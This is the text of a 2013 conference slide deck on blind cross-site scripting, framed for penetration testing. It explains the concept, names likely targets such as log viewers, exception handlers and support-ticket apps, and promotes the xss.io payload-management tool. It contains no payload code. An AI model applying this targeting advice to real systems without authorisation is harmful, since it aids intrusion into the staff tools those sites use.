Blind XSS

581 views

Published on

Adam Baldwin is the Team Lead at Lift Security, a web application security consultancy and the Chief Security Officer at &yet (andyet.net). He at one time possessed a GCIA and CISSP. Adam is a highly knowledegable information security expert having created the DVCS pillaging toolkit, helmet: the security header middleware for node.js, a minor contributor to the W3AF project, and has previously spoken at DEF CON, Toorcon, Toorcamp, Djangcon, and JSconf.

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
581
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
17
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Blind XSS

  1. 1. BLIND XSS @adam_baldwin Tuesday, February 26, 13
  2. 2. Adam Baldwin • Chief Security Officer at &yet • Security Lead for ^Lift Security • Also @liftsecurity & @nodesecurity Tuesday, February 26, 13
  3. 3. • What is it? • Using it in penetration tests • Challenges • xss.io LET’S TALK BLIND XSS Tuesday, February 26, 13
  4. 4. BLIND XSS WTF IS Tuesday, February 26, 13
  5. 5. • Reflected • Persistent (stored) • DOM XSS IS: Tuesday, February 26, 13
  6. 6. • Reflected • Persistent (stored) • DOM BLIND XSS IS: Tuesday, February 26, 13
  7. 7. IT’S A DIFFERENT CHALLENGE. Tuesday, February 26, 13
  8. 8. IT’S NOT LIKE BLIND SQLI WHERE YOU GET IMMEDIATE FEEDBACK. Tuesday, February 26, 13
  9. 9. YOU HAVE NO IDEA WHERE YOUR PAYLOAD’S GOING TO END UP. Tuesday, February 26, 13
  10. 10. YOU DON’T EVEN KNOW WHETHER YOUR PAYLOAD WILL EXECUTE (OR WHEN!) Tuesday, February 26, 13
  11. 11. YOU MUST THINK AHEAD ABOUT WHAT YOU WANT TO ACCOMPLISH. Tuesday, February 26, 13
  12. 12. ... AND YOU HAVE TO BE LISTENING. Tuesday, February 26, 13
  13. 13. FOR EXAMPLE... From a penetration test Tuesday, February 26, 13
  14. 14. Tuesday, February 26, 13
  15. 15. Tuesday, February 26, 13
  16. 16. Tuesday, February 26, 13
  17. 17. Tuesday, February 26, 13
  18. 18. Tuesday, February 26, 13
  19. 19. Tuesday, February 26, 13
  20. 20. Tuesday, February 26, 13
  21. 21. Tuesday, February 26, 13
  22. 22. Tuesday, February 26, 13
  23. 23. Tuesday, February 26, 13
  24. 24. Tuesday, February 26, 13
  25. 25. Tuesday, February 26, 13
  26. 26. Tuesday, February 26, 13
  27. 27. Tuesday, February 26, 13
  28. 28. Tuesday, February 26, 13
  29. 29. Tuesday, February 26, 13
  30. 30. Tuesday, February 26, 13
  31. 31. Tuesday, February 26, 13
  32. 32. Tuesday, February 26, 13
  33. 33. Tuesday, February 26, 13
  34. 34. Tuesday, February 26, 13
  35. 35. Tuesday, February 26, 13
  36. 36. Tuesday, February 26, 13
  37. 37. Tuesday, February 26, 13
  38. 38. Tuesday, February 26, 13
  39. 39. Tuesday, February 26, 13
  40. 40. 1.Carefully choose the right payload for the right situation. STEPS TO A SUCCESSFUL BLIND XSS EXPLOIT: Tuesday, February 26, 13
  41. 41. 1.Carefully choose the right payload for the right situation. 2.Get lucky! STEPS TO A SUCCESSFUL BLIND XSS EXPLOIT: Tuesday, February 26, 13
  42. 42. • Lots of payloads for various situations. • ...but doing everything would be overkill. HTML5SEC.ORG Tuesday, February 26, 13
  43. 43. PLAN YOUR PAYLOAD. HOW WILL THE APP USE YOUR DATA? Tuesday, February 26, 13
  44. 44. • log viewers • exception handlers • customer service apps (chats, tickets, forums, etc) • anything moderated NICE TARGETS: Tuesday, February 26, 13
  45. 45. Tuesday, February 26, 13
  46. 46. BLIND XSS MANAGEMENT Tuesday, February 26, 13
  47. 47. XSS.IO CAN HELP! Tuesday, February 26, 13
  48. 48. SIZE MATTERS... RIGHT? • Sometimes you need all the character space you can get. • No short-url GUID • xss.io uses custom referrer- based redirects instead Tuesday, February 26, 13
  49. 49. EXPLOIT CREATOR • Snippets for common tasks • Quickly create and reference dynamic payloads Tuesday, February 26, 13
  50. 50. DEAD DROP BLIND XSS API AND MANAGER Tuesday, February 26, 13
  51. 51. (XSS.IO DEMO) Tuesday, February 26, 13
  52. 52. </PRESENTATION> @adam_baldwin | @LiftSecurity Tuesday, February 26, 13

×